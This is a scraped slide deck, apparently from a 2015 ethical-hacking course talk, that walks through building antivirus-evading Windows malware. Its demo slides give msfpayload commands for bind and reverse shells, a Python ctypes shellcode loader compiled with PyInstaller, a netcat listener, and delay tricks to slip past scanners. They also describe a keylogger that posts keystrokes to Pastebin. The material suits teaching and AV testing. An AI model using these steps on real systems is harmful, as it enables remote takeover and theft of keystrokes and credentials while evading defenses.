2015 ICT Educator Conference San Francisco Mon Jan 5 2015 Bio CNIT 124 Advanced Ethical Hacking Violent Python Good coding principles Exception handling Modular design Optimization Commenting ID: 783795
Download The PPT/PDF document "Violent Python MPICT Winter" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.
Slide1
Violent PythonMPICT Winter 2015 ICT Educator ConferenceSan FranciscoMon, Jan 5 2015
Slide2Bio
Slide3CNIT 124Advanced Ethical Hacking
Slide4Violent PythonGood coding principlesException handlingModular designOptimizationCommentingFlow chartsFORGET THEM ALL
Slide5Violent PythonWe are hackersWe are here to BREAK STUFFIt should be fast and easy for a complete novice to hack together a simple script to do something fun!
Slide6Slide7Slide8Slide9Projects
Slide10Slide11AntivirusUngh! Good God y'all...What is it GOOD For?
Slide12Slide13Mikko Hypponen Video
Slide14Metasploit Payloads
Slide15MetasploitHundreds of payloadsThe simplest one: bind_tcpListens on a TCP port for commands
Slide16Simple Reverse ShellOne command to produce very simple Windows EXE malware
Slide17Antivirus Catches It
Slide18Norton v. Shell.exe
Slide19Norton Identifies the Metasploit Packer
Slide20VirusTotal: 37/49 Detections
Slide21How to Become 007
Slide22Slide23Python v. AVRound 1shell_bind_tcp
Slide24Export Metasploit Payloads to C
Slide25Use Ctypes Python Library
Slide26Compile it on WindowsInstall these things, in orderPython 2.7PyWin32pip-WinPyInstallerThis creates an EXE file that listens on a TCP port
Slide27DEMOOn Kalimsfpayload windows/shell_bind_tcp C > foonano foo
Change top to
from ctypes import *
shellcode = (
Change
bottom to
);
memorywithshell
= create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p)
)
shell()
Slide28DEMOOn Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller
--onefile --noconsole foo
Slide29VirusTotal: 1/50 Detection
Slide30Norton SupportI Tweeted about this, and @NortonSupport repliedVirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning@NortonSupport gave me a link for a 30-day trial version :)
Slide31Norton Wins!
Slide32Kaspersky Wins!Avast! doesn't detect itKaspersky detects it as HEUR:Trojan.Win32.Generic
Slide33Python v. AVRound 2shell_bind_tcpwith a delay
Slide34Slide35Slide36DEMOOn Kalicp foo foo2nano foo2
x=raw_input("Press Enter to continue")
On Windows, in pip-Win:
venv -c -i pyi-env-name
pyinstaller
--onefile foo2
Slide37Norton, Avast, & MSE Lose!
Slide38Kaspersky Wins!
Slide39Python v. AVRound 3shell_bind_tcpin two stagesno delay
Slide40Other AVTested on Mar 24, 2014 with a two-stage reverse shell and no time delayAl these failedNortonNod32Avast!360 Internet SecurityMcAfeeKaspersky
Slide41Remember Mikko?
Slide42F-Secure Wins!
Slide43AV Challenge
Slide44Posted April 3, 2014No reply from AV vendors, but Norton improved its detection after thatNow a delay is required
Slide45Python v. AVRound 4shell_bind_tcpwith a delay
Slide46INSTRUCTIONSOn Kalimsfpayload windows/shell_reverse_tcp LHOST=
192.168.119.252 C > rev
nano rev
Change top to
x=raw_input("Press Enter to continue")
from
ctypes import *
shellcode = (
Change
bottom to
);
memorywithshell
= create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p)
)
shell()
Slide47INSTRUCTIONSOn Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile revOn Kali
nc –lp 4444
Slide48Norton Loses
Slide49Kaspersky Wins
Slide50Advanced Malware Protection
Slide51ty @ChrisAbdalla_1 from HP ESP TippingPoint
Slide52A friend in the financial industry tested Evil.exe on a system protected by FireEyeFireEye gives no alerts and lets it post keystrokes right to Pastebin
Slide53Python Keylogger
Slide54Google "Python Keylogger"I used this one from 4 years ago
Slide55Post Keystrokes to Pastebin
Slide56ProblemPastebin busted me for making too many pastes in a 24-hour periodSo I wrote my own Pastebin imitation
Slide57Kaspersky & Avast! LOSE
Slide58Norton WINS!
Slide59But just add a delay...
Slide60F-Secure LOSES!
Slide61PRODUCT ANNOUNCEMENT!
Slide62Ultra-Advanced APT Toolsamsclass.info/evil.exe
Slide63Slide64UNSTOPPABLENone of these products stop itNortonMcAfeeKasperskyNod32F-SecureAvast!Microsoft Security Essentials
Slide65Slide66Slide67